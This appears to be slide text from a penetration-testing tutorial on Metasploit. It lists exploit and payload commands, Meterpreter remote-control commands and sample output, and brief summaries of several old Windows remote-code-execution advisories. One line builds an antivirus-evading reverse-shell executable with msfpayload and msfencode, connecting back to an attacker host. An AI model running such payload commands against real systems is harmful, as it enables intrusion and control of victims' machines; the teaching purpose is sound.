• “The Metasploit Framework is an advanced open-source for attacking, testing, and using exploit code.”• Metasploit software helps security and IT professionals identify security issues, verify vulnerability in system.• Perform penetration tests • Overt penetration testing • Covert penetration testing• Consists of tools, libraries, modules, and user interfaces. These are configured and combined to launch an exploit.• Written in Ruby.
• Professional approach to penetration testing: – Automation – Reconnaissance, exploitation.• All in one Solution – Multi-platform – Diverse range of target applications• Open Source – Custom payloads
• Choose module exploit: • show exploits: list available exploits within the framework • use exploit_name: choose exploit • info exploit_name: view information about exploit• Choose payload • Show payloads: show only the payloads that are com-patible with chosen module. • Info payload_name: view detail information about payload • set payload payload_name: choose payload
• Configure chosen payload. • show options: view the options which you must configure • set option_name value: configure option • show advanceds: show advance options • check: verify options are configured whether exactly or not • show targets: list vulnerable potential targets. • set TARGET value: choose target. • exploit: initiates our exploit and attempts to attack the target
Meterpreter, short for The Meta -Interpreter is an advancedpayload that is included in the Metaploit Framework. Itspurpose is to provide complex command for exploiting andattacking remote machine. The way that it accomplishesthis is by allowing developers to write their own extensionsin the form of shared object (DLL) ﬁles that can beuploaded and injected into a running process on a targetcomputer after exploitation has occurred.
• Fs: Provides interaction with the ﬁlesystem on the remote machine.• Net: Provides interaction with the network stack on the remote machine.• Process: Provides interaction with processes on the remote machine .• Sys: Provides interaction with the environment on the remote machine
• screenshot: capture desktop screen of victim• sysinfo: view information about platform of victim • meterpreter > sysinfo Computer: IHAZSECURITY OS : Windows XP (Build 2600, Service Pack 2). Arch : x86 Language: en_US
• execute: executes a process on the remote endpoint• kill: terminate one or more processes on the remote endpoint• Ps: list processes on the remote endpoint
Meterpreter> execute -f cmd –c execute: success, process id is 3516. execute: allocated channel 1 for new process.meterpreter> interact 1 interact: Switching to interactive console on 1... interact: Started interactive channel 1. Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:WINDOWS>ipconfig
• Encoding payload with MSFencode root@bt:/# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=31337 R |msfencode -e x86/shikata_ga_nai -t exe > /var/www/payload2.exe• Multi-encoding: allows the payload to be encoded several times to throw off antivirus programs
•Vulnerability in Server Service Could Allow Remote CodeExecution (958644)•The vulnerability could allow remote code execution if anaffected system received a specially crafted RPC request.On Microsoft Windows 2000, Windows XP, and WindowsServer 2003 systems, an attacker could exploit thisvulnerability without authentication to run arbitrary code.•Firewall best practices and standard default firewallconfigurations can help protect network resources fromattacks that originate outside the enterprise perimeter.http://technet.microsoft.com/en-us/security/bulletin/ms08-067
LSASS Vulnerability - CAN-2003-0533Impact of vulnerability: Remote Code ExecutionAn attacker who successfully exploited the most severe ofthese vulnerabilities could take complete control of anaffected system, including installing programs; viewing,changing, or deleting data; or creating new accounts thathave full privileges.This vulnerability is caused by an unchecked buffer in theLSASS service.
• This is a remote code execution vulnerability. An attacker who successfullyexploited this vulnerability could take complete control of an affected system.An attacker could then install programs; view, change, or delete data; orcreate new accounts.• Systems are only vulnerable to remote attack when sharing a printer and theremote attacker can access the printer share.•This vulnerability is caused when the Windows Print Spooler insufficientlyrestricts user permissions to access print spoolers.•Firewall best practices and standard default firewall configurations can helpprotect networks from attacks that originate outside the enterprise perimeter.Best practices recommend that systems that are connected to the Internethave a minimal number of ports exposed.•http://technet.microsoft.com/en-us/security/bulletin/MS10-061
• This vulnerability is caused by the Windows RPCSS service does notproperly check message inputs under certain circumstances. Afterestablishing a connection, an attacker could send a specially craftedmalformed RPC message to cause the underlying Distributed ComponentObject Model (DCOM) process on the remote system to fail in such a way thatarbitrary code could be executed.• To exploit this vulnerability, the attacker would require the ability to send aspecially crafted request to port 135, 139, 445 or 593 or any other specificallyconfigured RPC port on the remote machine.•Best practices recommend blocking all TCP/IP ports that are not actuallybeing used
• A remote code execution vulnerability exists in the ActiveX control for the Snapshot Viewer for Microsoft Access. An attacker could exploit the vulnerability by constructing a specially crafted Web page. When a user views the Web page, the vulnerability could allow remote code execution. An attacker who successfully exploited this vulnerability could gain the same user rights as the logged-on user.• http://technet.microsoft.com/en- us/security/bulletin/MS08-041